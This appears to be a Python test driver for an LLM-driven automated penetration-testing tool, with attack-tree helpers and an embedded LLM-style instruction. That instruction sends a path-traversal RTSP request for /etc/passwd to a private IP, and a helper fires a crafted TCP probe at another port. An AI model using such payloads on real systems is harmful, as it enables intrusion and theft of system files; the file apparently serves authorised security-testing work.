# [page residue] You can not select more than 25 topics. Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
#
# [page residue] 167 lines
# [page residue] 5.4 KiB

import re
# [page residue] 2 months ago
import subprocess
import tempfile
import os
import pexpect
import struct
import sys
import mysql.connector
import requests
from mycode.LLMManager import LLMManager
from mycode.TaskObject import TaskObject
from myutils.PickleManager import g_PKM
from mycode.InstructionManager import g_instrM
from mycode.TaskManager import g_TaskM
from mycode.PythonTManager import PythonTManager
from myutils.ConfigManager import myCongif
from mycode.DBManager import app_DBM
import textwrap
class Mytest:
    """Scratch helpers used by the manual test driver at the bottom of this file."""

    def update_node_inter(self, attack_index):
        """Move selected instructions from specific nodes up to their parents.

        Reads the attack tree stored under ``attack_index`` via ``g_PKM``,
        takes its depth-first node list and, for each hard-coded
        ``(node position, instruction position)`` pair, pops that entry from
        the list returned by the node's ``get_instr_user()`` and appends it
        to the list returned by the parent's ``get_instr_user()``. The tree
        is then written back under the same key.

        Args:
            attack_index: Key passed to ``g_PKM.ReadData`` / ``g_PKM.WriteData``.
        """
        attack_tree = g_PKM.ReadData(attack_index)
        nodes = attack_tree.traverse_dfs()
        # (index in the DFS node list, index of the instruction to move).
        # The pairs are applied in this exact order.
        relocations = ((6, 0), (39, 1), (49, 0))
        for node_pos, instr_pos in relocations:
            node = nodes[node_pos]
            instr = node.get_instr_user().pop(instr_pos)
            node.parent.get_instr_user().append(instr)
        g_PKM.WriteData(attack_tree, attack_index)

    def dynamic_fun(self, host="192.168.3.105", port=52989, timeout=20):
        """Send a fixed probe payload over TCP and report the reply as hex.

        Args:
            host: Address to connect to (defaults to the previously
                hard-coded target).
            port: TCP port to connect to (defaults to the previously
                hard-coded port).
            timeout: Socket timeout in seconds applied before connecting.

        Returns:
            ``(True, "SpecialCmd Response: <hex>")`` when a reply was read,
            or ``(False, <error text>)`` when any exception was raised.
        """
        import socket

        # Special payload built from the previously returned "99 -1 45973"
        # string; meant to imitate a protocol header.
        # NOTE(review): the backslashes in this literal are escaped, so the
        # payload carries the text characters "\x01..." rather than the raw
        # bytes 0x01 0x00 ... -- confirm this is intended.
        special_cmd = b'99\\x01\\x00\\x00\\x00'
        try:
            # The context manager closes the socket on every path, including
            # when connect/sendall/recv raise (previously it was leaked).
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(timeout)  # generous timeout for slow targets
                s.connect((host, port))
                s.sendall(special_cmd)
                response = s.recv(2048)
            return (True, f"SpecialCmd Response: {response.hex()}")
        except Exception as e:
            return (False, str(e))

    def do_test(self):
        """Placeholder hook; intentionally does nothing."""
        pass

    def tmp_test(self):
        """Print the last four items of a sample list.

        Emits a warning line first when the start index of that tail is odd.
        """
        list_a = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
        isart = len(list_a) - 4  # entries are normally expected to come in pairs
        if isart % 2 != 0:
            print("c_msg数量不对称,需要检查逻辑!")
        for msg in list_a[isart:]:
            print(msg)
if __name__ == "__main__":
    # Manual test driver: edit ``test_type`` below to choose which scenario runs.
    mytest = Mytest()
    LLM = LLMManager(1)
    current_path = os.path.dirname(os.path.realpath(__file__))
    print(current_path)
    test_type = 1
    task_id = 49
    task_Object = TaskObject("test_target", "cookie_info", 1, 1, 1, "local_ip", "", None)
    if test_type == 0:
        mytest.dynamic_fun()
    elif test_type == 1:
        # Get details of all custom functions.
        # HIGH_RISK_FUNCTIONS = ['eval', 'exec', 'os.system', 'subprocess.call', 'subprocess.Popen']
        #
        # NOTE(review): after this literal is evaluated the snippet text
        # contains "\\r\\n", so the snippet's own string literals yield the
        # characters backslash-r / backslash-n instead of CR LF -- unless
        # do_instruction unescapes the text first. Confirm which is intended.
        instruction = '''python-code
def dynamic_fun():
    import socket
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(20) # 设置超时时间为20秒
        s.connect(("192.168.3.105", 11200))
        # 发送畸形RTSP请求探测边界条件
        payload = "DESCRIBE rtsp://192.168.3.105/../../../../etc/passwd RTSP/1.0\\\\r\\\\n"
        payload += "CSeq: 6\\\\r\\\\n\\\\r\\\\n"
        s.send(payload.encode())
        response = s.recv(4096).decode()
        s.close()
        if "404" in response:
            return (False, "存在输入过滤机制")
        elif "root:" in response:
            return (True, "成功读取敏感文件")
        else:
            return (False, f"未知响应:{response}")
    except Exception as e:
        return (False, f"连接异常:{str(e)}")
'''
        task_Object.PythonM.start_pool()  # starting the worker subprocess pool is enough
        start_time, end_time, bsuccess, instr, reslut, source_result, ext_params = task_Object.do_instruction(instruction)
        # Stash the result
        oneres = {'执行指令': instr, '结果': reslut}
        print("----执行结果----")
        print(reslut)
    elif test_type == 2:  # attach an instruction to a node
        node_path = "目标系统->192.168.3.105->52989端口"
        instr_id = 3233
        g_TaskM.load_tasks()
        task = g_TaskM.tasks[task_id]
        nodes = task.attack_tree.traverse_dfs()
        # First node whose path matches, or None when there is no match.
        cur_node = next((node for node in nodes if node.path == node_path), None)
        if cur_node:
            str_instr = app_DBM.get_one_instr(instr_id)
            # Instructions containing "import" get the "python-code " prefix.
            if "import" in str_instr:
                str_instr = "python-code " + str_instr
            cur_node.test_add_instr(str_instr)
            cur_node.update_work_status(1)
            # Persist the modified tree
            g_PKM.WriteData(task.attack_tree, str(task.task_id))
        else:
            print("没找到节点!")
    elif test_type == 3:  # test feeding instructions into nodes
        strinstr = '''
'''
        strNodes = "执行系统命令探测,权限提升尝试,横向移动测试"
        # The names are separated by "," with no following space, so splitting
        # on ", " never matched and left everything as one entry. Split on ","
        # and strip instead, which handles both separator styles.
        nodes = [name.strip() for name in strNodes.split(',') if name.strip()]
        # De-duplicate while keeping first-seen order (set() order is arbitrary).
        unique_names = list(dict.fromkeys(nodes))
        for node_name in unique_names:
            print(node_name)
    elif test_type == 4:  # rewrite the stored messages
        attact_tree = g_PKM.ReadData("27")
        # Build a fresh node to obtain the new message
        from mycode.AttackMap import TreeNode
        testnode = TreeNode("test", 0)
        LLM.build_initial_prompt(testnode)  # the new message
        systems = testnode.parent_messages[0]["content"]
        # print(systems)
        # Walk every node of the stored tree and overwrite the content of
        # its first parent message with the new one.
        nodes = attact_tree.traverse_bfs()
        for node in nodes:
            node.parent_messages[0]["content"] = systems
        g_PKM.WriteData(attact_tree, "27")
        print("完成Messgae更新")
    elif test_type == 5:
        mytest.dynamic_fun()
    elif test_type == 6:
        mytest.tmp_test()
    else:
        pass